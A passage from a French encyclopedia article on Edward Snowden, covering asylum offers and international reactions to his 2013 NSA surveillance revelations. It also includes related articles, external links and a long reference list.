du monde, qui s'est déchaînée sur lui »[106]. Daniel Ortega confirme pour sa part avoir reçu une demande de Snowden à l'ambassade du Nicaragua à Moscou[104] : « Nous, nous sommes ouverts et respectueux du droit d'asile, et il est clair que si les circonstances le permettent, nous recevrons Snowden avec grand plaisir et lui donnerons l'asile ici au Nicaragua »[106]. Le 6 juillet 2013, suite à ses ennuis avec certains pays européens qui lui ont refusé le survol de leur espace aérien, le président Bolivien, Evo Morales, offre lui-aussi l'asile politique à Snowden[107]. Le 7 juillet 2013, le président cubain Raúl Castro soutient le droit de ces pays à offrir l’asile politique à ceux qui sont « persécutés pour leur idéal ou en raison de leur lutte pour les droits démocratiques »[108]. Ce soutien est important, notamment en l’absence de vol commercial direct à partir de Moscou vers l’un des trois pays latino-américains susceptibles d’offrir l’asile à Edward Snowden, ce qui l’obligerait théoriquement à faire escale à La Havane[108]. Le 10 juillet 2013, lors d'une interview avec le Guardian, Snowden a tenu à dissiper les suspicions de trahison pesant sur lui[109] : « Je n'ai jamais donné d'information à un quelconque gouvernement et ils n'ont jamais rien pris de mon ordinateur »[110]. En effet, le 23 juin 2013, le New York Times avait notamment affirmé que Snowden avait fourni des informations confidentielles à la Chine et à la Russie et que le contenu de ses ordinateurs avait été fouillé par ces pays alors qu'il se trouvait à Hongkong[111]. Le quotidien américain citait « deux experts dans le renseignement occidental » qui avaient « travaillé pour des agences de renseignement de gouvernements majeurs »[110]. Le 12 juillet 2013, lors d'une rencontre avec des avocats et des défenseurs des droits de l’homme à l’aéroport de Moscou, Edward Snowden déclare qu'il va redemander l'asile politique en Russie[112],[113]. Trois pays d'Amérique latine ainsi que Cuba sont prêt à l’accueillir, mais Snowden invoque l'impossibilité de rejoindre ces pays pour expliquer sa demande, n'ayant pas de passeport pour pouvoir se déplacer hors de Russie : « Je ne peux qu'accepter l'offre de la Russie car je suis dans l'impossibilité de me déplacer », explique-t-il[114]. Edward Snowden 413

Ce même jour, le président de la Douma, Sergueï Narychkine, s'exprime en faveur de l'accueil de Snowden : « La Russie doit accorder à Snowden l'asile politique ou un asile politique temporaire », déclare-t-il, le considérant « comme un défenseur des droits de l'homme »[115]. Le porte-parole de la présidence russe Dmitri Peskov réitère via l'agence Interfax les conditions déjà fixées la semaine dernière par Vladimir Poutine lui-même : s'il formule réellement une demande d'asile à la Fédération russe, « Snowden pourrait théoriquement rester si, premièrement, il renonce totalement à ses activités qui font du tort à nos partenaires américains, et, deuxièmement, si lui-même le souhaite »[113].

Réactions

Au sujet de ses révélations

Amérique

États-Unis Le 13 juin 2013, le directeur du FBI, Robert Mueller, confirme qu’une enquête pénale est lancée contre Edward Snowden[116]. « Ces fuites ont causé des dommages importants à notre pays et à notre sécurité. Nous prenons toutes les mesures nécessaires pour que cette personne soit tenue responsable pour ces fuites », a-t-il déclaré lors d’une audition devant la Chambre des représentants des États-Unis[117]. Le 19 juin 2013, le président des États-Unis, Barack Obama, en visite officielle à Berlin, indique en réponse à la chancelière allemande Angela Merkel, qui lui rappelait que la surveillance d'Internet doit avoir des limites, que le programme de surveillance PRISM ne s'applique qu'à la lutte contre le terrorisme et au trafic d'armes[118]. Le 22 juin 2013, selon le Washington Post[119], Edward Snowden est inculpé d'espionnage, de vol et d'utilisation illégale de biens gouvernementaux[10],[11]. La plainte a été déposée en Virginie où se trouve le siège de Booz Allen Hamilton[120].

Brésil Le 7 juillet 2013, suite aux révélations d'Edward Snowden concernant l'espionnage des entreprises et particuliers brésiliens, le porte-parole du ministère des Affaires étrangères brésilien, Tovar Nunes, a qualifié ces révélations « d'extrêmement graves »[].

Asie

Hong Kong Le 15 juin 2013, suite aux premières révélations dans la presse, plusieurs centaines de manifestants défilent à Hong Kong, notamment devant l'ambassade américaine. Les activistes demandent que Edward Snowden soit protégé, tout en dénoncant les opérations américaines d'espionnage de la Chine et de Hong Kong[121]. Edward Snowden 414

Europe

Union européenne Suite aux révélations du 29 juin 2013 du Spiegel et du Guardian sur l'espionnage de l'Union européenne par la NSA, le président du Parlement européen, l'Allemand Martin Schulz, estime que « si cela se confirme, il s'agit d'un immense scandale » et que « cela nuirait considérablement aux relations entre l'Union européenne et les États-Unis »[122]. Le ministre des Affaires étrangères du Luxembourg, Jean Asselborn, indique que « les États-Unis feraient manifestement mieux de surveiller leurs services de renseignement plutôt que leurs alliés ». Selon lui, l'espionnage américain est « hors de contrôle », en soulignant que si les activités de renseignement « sont justifiées par la lutte contre le terrorisme, l'Union européenne et ses diplomates ne sont pas des terroristes »[],[]. Le 3 juillet 2013, le groupe écologiste au Parlement européen, par la voix de son co-président Daniel Cohn-Bendit, indique, lors d'une interview sur France Inter, proposer Edward Snowden au Prix Sakharov pour la liberté de pensée[123]. Le député européen appelle également à une rupture immédiate des négociations sur le traité de libre-échange transatlantique, tant qu'un accord n'a pas été signé avec les États-Unis sur la protection des données[56].

France Le 1er juillet 2013, la France, par la voix de son ministre des Affaires étrangères, Laurent Fabius, demande des explications aux autorités américaines « dans les plus brefs délais » : « Ces faits, s’ils étaient confirmés, seraient tout à fait inacceptables » indique-t-il. La Garde des Sceaux, ministre de la Justice, Mme Christiane Taubira, va plus loin, en estimant que si Washington avait bel et bien mené les opérations d’espionnage décrites par le Spiegel, ce serait « un acte d’hostilité inqualifiable »[]. Le même jour, le président de la République française, François Hollande, déclare que : « Nous ne pouvons pas accepter ce type de comportement entre partenaires et alliés ». « Nous demandons que cela cesse immédiatement », ajoute-t-il, en marge d'un déplacement à Lorient, jugeant que « les éléments sont déjà suffisamment réunis pour que nous demandions des explications »[124]. Le 7 juillet 2013, une manifestation de soutien à Edward Snowden, comprenant une quarantaine de personnes, pour la plupart des militants d’organisations de défense des droits et libertés sur internet, s'est tenue à Paris, place du Trocadéro[]. Le 11 juillet 2013, à la suite des révélations d'Edward Snowden, la Fédération internationale des ligues des droits de l'homme (FIDH) et la Ligue française pour la défense des droits de l'homme et du citoyen (LDH) déposent conjointement une plainte contre X auprès du procureur de la République de Paris. Celle-ci porte sur l'accès frauduleux dans un système de traitement automatisé de données, la collecte illicite de données personnelles, l'atteinte à la vie privée et l'atteinte au secret des correspondances électroniques[125].

Personnalités publiques • Le fondateur de WikiLeaks, Julian Assange, et le réalisateur américain Michael Moore considèrent Edward Snowden comme un héros national[126]. • Le collectif hacktiviste Anonymous a lui aussi rendu hommage à Snowden, le qualifiant « d'un des plus grands lanceurs d'alerte de l'histoire »[4]. • Daniel Ellsberg, responsable de la fuite des Pentagon Papers dans les années 1970 pendant la guerre du Viêt Nam, déclare qu'Edward Snowden a eu raison de fuir pour éviter son emprisonnement aux États-Unis[127]. « Bon nombre de gens nous comparent, Edward Snowden et moi, et lui reprochent d'avoir quitté le pays et de chercher asile à l'étranger plutôt que de se présenter devant un tribunal comme je l'ai fait. Je pense qu'ils ont tort. Mon histoire remonte à une autre époque, et les États-Unis n'étaient pas ce qu'ils sont aujourd'hui. » Edward Snowden 415

Manifestations de soutien

Manifestation contre PRISM à Berlin, lors de la visite du président Manifestation de soutien à Edward Snowden à Varsovie, devant le américain Barack Obama, organisée par le Parti pirate le . palais présidentiel, le .

Au sujet de sa fuite et de sa demande d'asile

Amérique

États-Unis Le 23 juin 2013, juste avant de quitter Hong Kong, le passeport d'Edward Snowden est révoqué[128]. À ce sujet, la porte-parole du département d'État, Jennifer Psaki (en), déclare que « la révocation du passeport de quelqu'un sous mandat d'arrêt pour crime est courant et n'affecte pas son statut de citoyen (américain) »[77]. Le 24 juin 2013, Caitlin Hayden (en), la porte-parole de la NSA, déclare au sujet de l'arrivée de Snowden à Moscou ce même jour que, « Compte tenu de notre coopération après les attentats du marathon de Boston et notre histoire avec la Russie sur le renforcement des lois sur ces questions de sécurité — y compris concernant le renvoi en Russie de grands criminels à la demande de Moscou — nous espérons que le gouvernement russe va étudier toutes les options possibles pour expulser M. Snowden vers les États-Unis pour répondre devant la justice des charges qui pèsent contre lui »[80]. Edward Snowden 416

Bolivie

Le 2 juillet 2013, le président bolivien, Evo Morales, déclare que son pays est prêt à examiner la demande d'asile politique de Snowden. « S'il y avait une demande, nous serions bien sûr prêt à en débattre et à prendre en considération cette idée », déclare M. Morales à la chaîne de télévision anglophone russe Russia Today[129]. Le 6 juillet 2013, après avoir ressenti le détournement de son avion présidentiel comme une tentative d'intimidation de la part du gouvernement des États-Unis, Evo Morales déclare que Snowden est le bienvenu en Bolivie. Il dit proposer cette offre d'asile en réaction contre les nations européennes et américaine, qu'il accuse d'avoir [107],[130] temporairement bloqué son vol de retour de Moscou le 3 juillet 2013 . Le président bolivien Evo Morales lors de la Équateur Conférence sur le changement climatique de Le 24 juin 2013, le président équatorien, Rafael Correa, annonce que son pays analysera l'ONU en 2009 à « avec une très grande responsabilité » la demande d'asile déposé par l'ex-consultant[131]. Copenhague (COP15). Un peu plus tôt, le chef de la diplomatie équatorien, Ricardo Patiño, avait défendu la demande d'asile déposée par Snowden auprès de son pays, estimant que son action avait permis de « faire la lumière » sur les agissements des États-Unis[83] ; selon lui « Il en va de la liberté d'expression et de la sécurité des citoyens dans le monde », ainsi que « de la confidentialité des communications ». « Nous savons qu'il est à Moscou. Nous sommes en discussion avec les autorités », a précisé le chef de la diplomatie équatorienne[132].

Le 29 juin 2013, le président équatorien rejette la demande d'asile, à la demande du vice-président américain Joe Biden. Il déclare ne pas pouvoir engager de procédure de demande d'asile si le demandeur ne se trouve pas sur le sol équatorien, et laisse la Russie gérer cette situation : « Pour l'instant, la solution, la destination de Snowden, est entre les mains des autorités russes »[133].

Nicaragua Le 5 juillet 2013, le président de la République du Nicaragua, Daniel Ortega, annonce que son pays est disposé à donner l'asile à Snowden si les conditions sont réunies. Il déclare « Nous sommes ouverts et respectueux du droit d'asile, et c'est clair que si les circonstances le permettent, nous recevrons Snowden avec plaisir et lui donnerons l'asile, ici au Nicaragua »[134].

Venezuela Le 2 juillet 2013, le président du Venezuela, Nicolás Maduro, en déplacement en Russie, déclare à des journalistes que son pays n'a pas encore reçu de demande d'asile, mais a salué l'action du lanceur d'alerte. « Il n'a tué personne et n'a pas posé de bombe », déclare-t-il, cité par l'agence Interfax. « Ce qu'il a fait, c'est dire une grande vérité afin d'empêcher des guerres. Il mérite une protection »[129]. Le 5 juillet 2013, le président annonce qu'il « a décidé d'accorder l'asile humanitaire au jeune américain Edward Snowden, pour qu'il puisse venir et vivre loin de la persécution de l'impérialisme nord américain »[134].

Europe

Union européenne Le 2 juillet 2013, le président du Parlement européen, l’Allemand Martin Schulz, déclare à la télévision publique allemande : « j’ai de la compréhension pour cette demande. Si M. Snowden fait une demande, les autorités doivent examiner s’il fait effectivement l’objet d’une persécution politique ». Il ajoute : « La déception au sujet de Barack Obama est profonde. J'ai considéré cet homme comme un rénovateur, j'ai cru qu'il ferait entrer plus de démocratie, plus de transparence dans la politique américaine. Visiblement, ce n'est pas le cas »[135]. Edward Snowden 417

Plusieurs pays d'Europe comme la Finlande, l'Irlande, l'Autriche, l'Italie ou l'Espagne précisent que les demandeurs d'asile doivent être physiquement sur leur territoire afin que la requête d'asile soit valide, et ne peuvent donc pas faire suite à la demande d'asile d'Edward Snowden[136].

Allemagne Le 2 juillet 2013, le ministre des affaires étrangères allemand, Guido Westerwelle, confirme avoir reçu une demande d'asile politique d'Edward Snowden, une requête « transmise [...] sans délai aux autorités compétentes » et que le pays examinera « en conformité avec la loi »[129].

France Plusieurs partis français s'engagent en faveur d'Edward Snowden. Ainsi, le 10 juin 2013, Marine Le Pen déclare que « L'ancien agent de la CIA Edward Snowden doit être mis en sécurité au plus vite » et que la France doit lui accorder l'asile[137]. Le 30 juin 2013, Jean-Luc Mélenchon le décrit comme un « bienfaiteur » et appelle la France à lui accorder l'asile politique[138]. Cette position est reprise par le Parti de gauche, dont le groupe au Conseil de Paris dépose le 1er juillet 2013 une motion afin d'élever le hacker au rang de citoyen d'honneur de la Ville de Paris[139]. Le même jour, le mouvement Europe Écologie Les Verts (EELV) publie un communiqué demandant à la France d'accorder « sans délai » l'asile à Edward Snowden[140]. Le 1er juillet 2013, le président de la République française François Hollande déclare qu'il a eu connaissance par voix de presse de la demande d'asile de l'informaticien à la France mais qu'officiellement rien n'était parvenu aux services français[141]. François Hollande prône une « position coordonnée, commune » de l'Europe dans ce dossier[129]. Le 4 juillet 2013, le ministère de l’Intérieur français annonce avoir rejeté la demande d’asile d’Edward Snowden : « La France a reçu, comme beaucoup d’autres pays, par l’intermédiaire de son ambassade à Moscou, une demande d’asile de Edward Snowden. Compte tenu des éléments d’analyse juridique et de la situation de l’intéressé, il n’y sera pas donné suite »[142],[143]. Plus précisément, ce n'est pas l'asile, au sens usuel du terme (dont l'attribution est de la compétence de l'Office français de protection des réfugiés et apatrides (OFPRA), mais l'entrée sur le territoire français qui lui a été refusée par les autorités[144],[145].

Distinctions • Le 8 juillet 2013, Edward Snowden s'est vu remettre le Prix Sam Adams[Qui ?] 2013, décerné chaque année par le « Sam Adams Associates for Integrity in Intelligence » — un groupe d'anciens d'officiers de la CIA — à un professionnel des services de renseignements qui a pris position en faveur de l'intégrité et de l'éthique[],[].

Annexes

Filmographie

Documentaire • (en) Interview d'Edward Snowden (durée : 12 minutes et 25 secondes)par le journaliste Glenn Greenwald et la productrice Laura Poitras, enregistrée le 6 juin 2013 à Hong Kong et diffusée le 9 juin 2013 par The Guardian : NSA whistleblower Edward Snowden: 'I don't want to live in a society that does these sort of things' [146] (Youtube) - Sous-titrage en français • (en) Seconde partie de l'interview d'Edward Snowden (durée : 7 minutes et 7 secondes) par le journaliste Glenn Greenwald et la productrice Laura Poitras , enregistrée le 6 juin 2013 à Hong Kong, et diffusée le 8 juillet 2013 par The Guardian : The US government will say I aided our enemies [147] (Youtube) - Sous-titrage en français Edward Snowden 418

Fiction • (en) Court métrage sur Verax (Edward Snowden), tourné entre le 20 et le 23 juin 2013, à Hong Kong (Chine) par un groupe de producteurs indépendants (Jeff Floro, Edwin Lee, Shawn Tse, Marcus Tsui) : Verax (film)

Articles connexes •• Agence nationale de la sécurité des systèmes d'information •• Cyberattaque •• Cyberguerre •• Direction de la Surveillance du territoire •• Flame •• Information classifiée •• Information sensible •• Julian Assange •• Lanceur d'alerte •• en:Mass surveillance •• Renseignement militaire •• Secret Intelligence Service •• Sécurité des systèmes d'information •• Service canadien du renseignement de sécurité •• Service fédéral de sécurité de la Fédération de Russie •• Source (information) •• Stuxnet •• Vie privée et informatique •• WikiLeaks Programmes de surveillance : • Boundless informant (USA) • Echelon ( USA, Royaume-Uni, Canada, Australie et Nouvelle-Zélande ) • Intelligence Community (USA) • INDECT (Europe) • Perfect Citizen (USA) • Programme de surveillance électronique de la NSA (USA) • en:Room 641A (dit "Upstream program". USA) • TEMPEST (USA) • Tempora (Royaume-Uni)

Liens externes • Une infographie détaillant le système PRISM [148] - Le Monde, 11 juin 2013 • Espionnage : les géants du Web gênés, la source révélée [149] - Benjamin Ferran, Le Figaro, 9 juin 2013 • (en) Edward Snowden says motive behind leaks was to expose ‘surveillance state’ [150] - Gellman, Barton et Jerry Markon, The Washington Post, 9 juin 2013 • (en) Edward Snowden comes forward as source of NSA leaks [151] - Gellman, Barton, Aaron Blake et Greg Miller, The Washington Post, 9 juin 2013 • (en) NSA leaker comes forward, warns of agency's 'existential threat' [152] - Matt Smith, CNN 10 juin 2013 • (en) Edward Snowden: the whistleblower behind the NSA surveillance revelations [153] - Glenn Greenwald, Ewen MacAskill et Laura Poitras, The Guardian, 10 juin 2010 Edward Snowden 419

Notes et références

[1] Spencer Ackerman à Washington, Edward Snowden did enlist for special forces, US army confirms (http:/ / www. guardian. co. uk/ world/

2013/ jun/ 10/ edward-snowden-army-special-forces), The Guardian, 10 juin 2013

[2] , Prism, Snowden, et les guignols de la NSA (http:/ / www. slate. fr/ monde/ 73729/ prism-snowden-nsa), Slate, publié le 10 juin et mis à jour le 11 juin 2013

[3] Céline Lussato, Surveillance par la NSA : qui est Edward Snowden ? (http:/ / tempsreel. nouvelobs. com/ monde/ 20130610. OBS2624/

surveillance-par-la-nsa-qui-est-edward-snowden. html), Le nouvelobs.com avec l'AFP, 10 juin 2013

[4] Surveillance d'Internet : un ancien employé de la CIA à l'origine des fuites (http:/ / www. lemonde. fr/ ameriques/ article/ 2013/ 06/ 09/

un-ancien-employe-de-la-nsa-derriere-les-revelations-sur-les-ecoutes-numeriques_3426888_3222. html), Le monde.fr avec l'AFP et Reuters, article publié le 9 juin et mis à jour le 10 juin 2013 [5] Glenn Greenwald, Ewen MacAskill et Laura Poitras à Hong Kong, Edward Snowden: the whistleblower behind the NSA surveillance

revelations (http:/ / www. guardian. co. uk/ world/ 2013/ jun/ 09/ edward-snowden-nsa-whistleblower-surveillance?guni=Network front:network-front aux-1 mini-bento:Bento box 8 col:Position1:sublinks), The Guardian.co.uk, 10 juin 2013

[6] Barton Gellman, Aaron Blake et Greg Miller, Edward Snowden comes forward as source of NSA leaks (http:/ / articles. washingtonpost.

com/ 2013-06-09/ politics/ 39856642_1_extradition-nsa-leaks-disclosures),The Washington Post, 9 juin 2013

[7] Scandale du système de surveillance américain: Si vous avez raté le début… (http:/ / www. 20minutes. fr/ monde/ etats_unis/ 1170571-20130610-scandale-systeme-surveillance-americain-si-debut), 20minutes.fr avec l'AFP, 10 juin 2013

[8] Le FBI aurait accès aux serveurs de Google, Facebook, Microsoft, Yahoo! et d'autres géants d'Internet (http:/ / www. lemonde. fr/ ameriques/

article/ 2013/ 06/ 07/ le-fbi-a-acces-aux-serveurs-des-geants-d-internet_3425810_3222. html), Le Monde.fr avec les agences AFP et Reuters, 7 juin 2013

[9] Tanguy Berthemet, Edward Snowden, l'homme qui fait trembler le gouvernement américain (http:/ / www. lefigaro. fr/ international/ 2013/

06/ 10/ 01003-20130610ARTFIG00394-etats-unis-edward-snowden-un-whistleblower-contre-la-nsa. php), Le Figaro.fr, 10 juin 2013

[10] Snowden inculpé par la justice des États-Unis pour espionnage (http:/ / www. liberation. fr/ monde/ 2013/ 06/ 22/ snowden-inculpe-pour-espionnage_912928), Libération.fr avec l'AFP, 22 juin 2013

[11] Chloé Woitier, Les États-Unis négocient à Hongkong l'extradition d'Edward Snowden (http:/ / www. lefigaro. fr/ international/ 2013/ 06/ 22/

01003-20130622ARTFIG00255-le-lanceur-d-alerte-edward-snowden-inculpe-pour-espionnage. php), Le Figaro.fr avec les agences AFP, AP, Reuters, 22 juin 2013

[12] Tracy Connor, What we know about NSA leaker Edward Snowden (http:/ / usnews. nbcnews. com/ _news/ 2013/ 06/ 10/ 18882615-what-we-know-about-nsa-leaker-edward-snowden?lite), NBC Nightly News, 10 juin 2013

[13] Colby Itkowitz et Daniel Patrick Sheehan, Edward Snowden's father, stepmother plan to make public statement (http:/ / www. mcall. com/

news/ breaking/ mc-pa-ed-snowden-nsa-leak-20130610,0,7199785. story), The Morning Call, 10 juin 2013

[15] http:/ / www. lefigaro. fr/ international/ 2013/ 06/ 24/ 01003-20130624ARTFIG00576-ed-snowden-agent-ambigu-de-la-verite. php

[16] Profile: Edward Snowden (http:/ / www. bbc. co. uk/ news/ world-us-canada-22837100), BBC.co.uk, 10 juin 2013

[17] http:/ / www. usatoday. com/ story/ news/ nation/ 2013/ 06/ 09/ edward-snowden-guardian-interview/ 2405873 Donna Leinwand Leger, USA Today 9 juin 2013, consulté le 9 juin 2013

[18] Meenal Vamburkar, Edward Snowden’s Father Speaks Out To Fox About Media ‘Misinformation (http:/ / www. mediaite. com/ tv/

edward-snowdens-father-speaks-out-to-fox-about-media-misinformation-asks-son-to-stop-leaking/ ), Mediaite.com, article du 17 juin consulté le 19 juin 2013.

[19] http:/ / www. npr. org/ templates/ story/ story. php?storyId=191987129 Associated Press, consulté le 15 juin 2013

[20] http:/ / www. nytimes. com/ 2013/ 06/ 16/ us/ for-snowden-a-life-of-ambition-despite-the-drifting. html?pagewanted=all The New York Times, John M. Broder, Scott Shane, le 15 juin 2013.

[22] http:/ / www. telegraph. co. uk/ news/ worldnews/ northamerica/ usa/ 10112012/

Edward-Snowdens-girlfriend-Lindsay-Mills-lost-and-alone-after-whistleblower-flees-to-Hong-Kong. html Nick Allen, Raf Sanchez, The Daily Telegraph, consulté le 12 juin 2013

[23] The Stickers on Edward Snowden’s Laptop (http:/ / thelede. blogs. nytimes. com/ 2013/ 06/ 10/ the-stickers-on-edward-snowdens-laptop/ ) - John Schwartz, The Lede, blog The New York Times, 10 juin 2013

[24] Edward Snowden, NSA files source: 'If they want to get you, in time they will' (http:/ / www. guardian. co. uk/ world/ 2013/ jun/ 09/ nsa-whistleblower-edward-snowden-why) - The Guardian, 10 juin 2013

[25] Liste des donateurs de la campagne de Ron Paul (http:/ / images. nictusa. com/ cgi-bin/ fecimg/ ?12952514893) - Federal Election Commission

[26] http:/ / www. francetvinfo. fr/ espionnage-du-web-qui-est-vraiment-le-lanceur-d-alerte-edward-snowden_344390. html

[27] http:/ / www. businessinsider. com/ edward-snowden-describes-cia-tricks-2013-6

[28] http:/ / www. reuters. com/ article/ 2013/ 06/ 16/ us-usa-security-switzerland-snowden-idUSBRE95F09120130616

[29] http:/ / www. forbes. com/ sites/ andygreenberg/ 2013/ 06/ 18/ nsa-director-says-agency-implementing-two-person-rule-to-stop-the-next-edward-snowden/

[30] http:/ / freebeacon. com/ officials-worried-snowden-will-pass-secrets-to-chinese/

[31] http:/ / www. guardian. co. uk/ world/ 2013/ jun/ 17/ edward-snowden-nsa-files-whistleblower Edward Snowden 420

[32] http:/ / www. liberation. fr/ monde/ 2013/ 06/ 25/ la-russie-nie-tout-rapport-avec-edward-snowden_913553 Voir le dernier paragraphe de l'article

[33] Lucie Ronfaut, Espionnage : une clé USB à l'origine du scandale (http:/ / www. lefigaro. fr/ hightech/ 2013/ 06/ 14/

01007-20130614ARTFIG00484-espionnage-une-cle-usb-a-l-origine-du-scandale. php), Le Figaro.fr, 14 juin 2013

[34] http:/ / www. latimes. com/ news/ politics/ la-pn-snowden-nsa-secrets-thumb-drive-20130613,0,791040. story

[35] http:/ / www. usatoday. com/ story/ news/ nation/ 2013/ 06/ 11/ booz-allen-snowden-fired/ 2411231/

[36] Vincent Hermann, PRISM : Snowden révèle que la NSA s'est introduite dans les routeurs chinois (http:/ / www. pcinpact. com/ news/

80526-prism-snowden-revele-que-nsa-sest-introduite-dans-routeurs-chinois. htm), PC INpact, 13 juin 2013

[37] http:/ / www. lefigaro. fr/ international/ 2013/ 06/ 10/

01003-20130610ARTFIG00394-etats-unis-edward-snowden-un-whistleblower-contre-la-nsa. php

[38] http:/ / www. 20minutes. fr/ monde/ etats_unis/ 1170571-20130610-scandale-systeme-surveillance-americain-si-debut

[39] http:/ / www. salon. com/ 2013/ 06/ 10/ qa_with_laura_poitras_the_woman_behind_the_nsa_scoops/

[40] http:/ / www. huffingtonpost. com/ 2013/ 06/ 10/ edward-snowden-glenn-greenwald_n_3416978. html

[41] http:/ / www. washingtonpost. com/ world/ national-security/

code-name-verax-snowden-in-exchanges-with-post-reporter-made-clear-he-knew-risks/ 2013/ 06/ 09/

c9a25b54-d14c-11e2-9f1a-1a7cdee20287_print. html

[42] http:/ / articles. washingtonpost. com/ 2013-06-06/ news/ 39784046_1_prism-nsa-u-s-servers

[43] http:/ / www. washingtonpost. com/ world/ national-security/

code-name-verax-snowden-in-exchanges-with-post-reporter-made-clear-he-knew-risks/ 2013/ 06/ 09/

c9a25b54-d14c-11e2-9f1a-1a7cdee20287_story. html

[44] http:/ / www. politico. com/ story/ 2013/ 06/ edward-snowden-nsa-leaker-glenn-greenwald-barton-gellman-92505. html

[45] PRISM : Edward Snowden possède des preuves des cyberattaques US contre la Chine (http:/ / www. 01net. com/ editorial/ 597585/

prism-edward-snowden-possede-des-preuves-des-cyberattaques-us-contre-la-chine/ ) -01net.com, 14 juin 2013

[46] Snowden possède des documents secrets sur les cyberattaques en Chine (http:/ / www. lepoint. fr/ monde/

snowden-possede-des-documents-secrets-sur-les-cyberattaques-en-chine-14-06-2013-1680764_24. php) - Le Point, 14 juin 2013

[48] http:/ / www. france24. com/ fr/ 20130617-londres-espionnage-delegues-g20-g8-brown-services-secret-snowden-internet

[49] http:/ / www. lemonde. fr/ technologies/ article/ 2013/ 06/ 17/

la-grande-bretagne-a-espionne-des-diplomates-lors-du-g20-de-londres_3431057_651865. html

[50] http:/ / www. pcinpact. com/ news/ 80584-snowden-royaume-uni-aurait-espionne-membres-g20-en-2009. htm

[51] http:/ / journalmetro. com/ monde/ 333036/ surveillance-le-r-u-a-utilise-les-cables-optiques/

[53] http:/ / lexpansion. lexpress. fr/ high-tech/

operation-tempora-comment-les-britanniques-depassent-les-americains-pour-espionner-internet_390971. html

[54] http:/ / www. scmp. com/ news/ hong-kong/ article/ 1266875/ exclusive-us-hacked-pacnet-asia-pacific-fibre-optic-network-operator

[55] http:/ / www. liberation. fr/ monde/ 2013/ 06/ 30/ berlin-et-bruxelles-tirent-les-grandes-oreilles-de-l-amerique_914864

[56] http:/ / www. france24. com/ fr/ 20130630-affaire-snowden-union-europeenne-ciblee-prism-etats-unis-scandale-espionnage

[57] http:/ / www. lefigaro. fr/ international/ 2013/ 07/ 01/

01003-20130701ARTFIG00279-l-ambassade-de-france-a-washington-espionnee-par-la-nsa. php

[58] http:/ / www. guardian. co. uk/ world/ 2013/ jun/ 30/ nsa-leaks-us-bugging-european-allies

[59] http:/ / www. spiegel. de/ international/ world/ whistleblower-snowden-claims-german-intelligence-in-bed-with-nsa-a-909904. html

[60] http:/ / www. rfi. fr/ ameriques/ 20130707-affaire-snowden-nsa-espionne-bnd-espions-allemands-spiegel

[61] http:/ / www. leparisien. fr/ international/ espionnage-snowden-accuse-les-services-de-renseignements-europeens-07-07-2013-2962025. php

[62] Edward Snowden : "Le FBI, la NSA et la CIA peuvent obtenir tout ce qu'ils veulent" (http:/ / www. lemonde. fr/ technologies/ article/ 2013/

06/ 17/ edward-snowden-s-explique-en-direct-sur-le-site-du-guardian_3431672_651865. html) - Le Monde, 17 juin 2013

[63] http:/ / www. lemonde. fr/ technologies/ article/ 2013/ 06/ 13/ les-revelations-de-snowden-a-la-une-de-la-presse-chinoise_3429043_651865. html

[64] Tanguy Berthemet, Espionnage : Ed Snowden, le «lanceur d'alerte» a disparu (http:/ / www. lefigaro. fr/ international/ 2013/ 06/ 11/

01003-20130611ARTFIG00306-ed-snowden-le-lanceur-d-alerte-a-disparu. php), Le figaro.com, le 11 juin 2013

[65] http:/ / www. 20minutes. fr/ monde/ 1170733-20130610-scandale-systeme-surveillance-americain-risque-taupe-edward-snowden

[66] http:/ / www. lexpress. fr/ actualite/ monde/ surveillance-d-internet-snowden-promet-de-nouvelles-revelations_1257008. html

[67] http:/ / thelede. blogs. nytimes. com/ 2013/ 06/ 25/ why-snowdens-visitors-put-their-phones-in-the-fridge/

[68] http:/ / ahprojects. com/ about

[69] http:/ / makezine. com/ 2013/ 06/ 26/ edward-snowden-can-a-refrigerator-function-as-a-faraday-cage/

[70] http:/ / www. courrierinternational. com/ article/ 2013/ 07/ 08/ snowden-est-il-givre

[71] Scandale Prism : pour la presse chinoise, l'extradition de Snowden serait une "trahison" (http:/ / www. lemonde. fr/ technologies/ article/

2013/ 06/ 17/ scandale-prism-pour-la-presse-chinoise-l-extradition-de-snowden-serait-une-trahison_3431051_651865. html) - Le Monde, 17 juin 2013

[72] Affaire Edward Snowden : des coïncidences troublantes, la Chine aurait-elle eu un rôle ? (http:/ / leplus. nouvelobs. com/ contribution/

887409-affaire-edward-snowden-des-coincidences-troublantes-la-chine-aurait-elle-eu-un-role. html) - Le Nouvel Observateur, 14 juin 2013 Edward Snowden 421

[73] Edward Snowden: Naive NSA Whistleblower, Chinese Spy, or Something Else Entirely? (http:/ / blogsofwar. com/ 2013/ 06/ 10/

edward-snowden-naive-nsa-whistleblower-chinese-spy-or-something-else-entirely/ ) - Blogs of War, 10 juin 2013

[74] http:/ / tempsreel. nouvelobs. com/ monde/ 20130617. OBS3646/ snowden-promet-des-revelations-sur-l-acces-direct-aux-donnees. html

[75] http:/ / www. liberation. fr/ monde/ 2013/ 06/ 17/ snowden-je-ne-suis-pas-un-espion-chinois_911563

[76] Russia Today, « US whistleblower Snowden on flight to ‘third country’ via Moscow » (http:/ / rt. com/ news/

snowden-fly-moscow-aeroflot-125/ ), 23 juin 2013

[77] http:/ / www. reuters. com/ article/ 2013/ 06/ 23/ us-usa-security-flight-idUSBRE95M02H20130623

[78] Laure Mandeville, Derrière Snowden, une partie géopolitique anti-américaine (http:/ / www. lefigaro. fr/ international/ 2013/ 06/ 24/

01003-20130624ARTFIG00285-derriere-snowden-une-partie-geopolitique-anti-americaine. php), Le Figaro.fr, le 24 juin 2013

[79] Vidéo, Edward Snowden brouille les pistes (http:/ / www. francetvinfo. fr/ edward-snowden-brouille-les-pistes_354836. html), France 3, 24 jin 2013

[80] La cavale invisible d'Edward Snowden (http:/ / www. lefigaro. fr/ international/ 2013/ 06/ 24/

01003-20130624ARTFIG00341-snowden-attend-une-reponse-de-l-equateur. php), Le Figaro.fr, 24 juin 2013

[81] http:/ / www. telegrafo. com. ec/ actualidad/ item/ carta-a-rafael-correa. html

[82] "Moi, Edward Snowden, je vous écris…." (http:/ / www. courrierinternational. com/ revue-de-presse/ 2013/ 06/ 25/ moi-edward-snowden-je-vous-ecris), Courrier international, 25 juin 2013

[83] Clara Beaudoux, L'Équateur "analyse" la demande d'asile d'Edward Snowden (http:/ / www. franceinfo. fr/ monde/ l-equateur-analyse-la-demande-d-asile-d-edward-snowden-1038375-2013-06-24), France Info, 24 juin 2013

[84] Toujours à Moscou, Snowden au cœur d'une querelle internationale (http:/ / www. lemonde. fr/ ameriques/ article/ 2013/ 06/ 25/

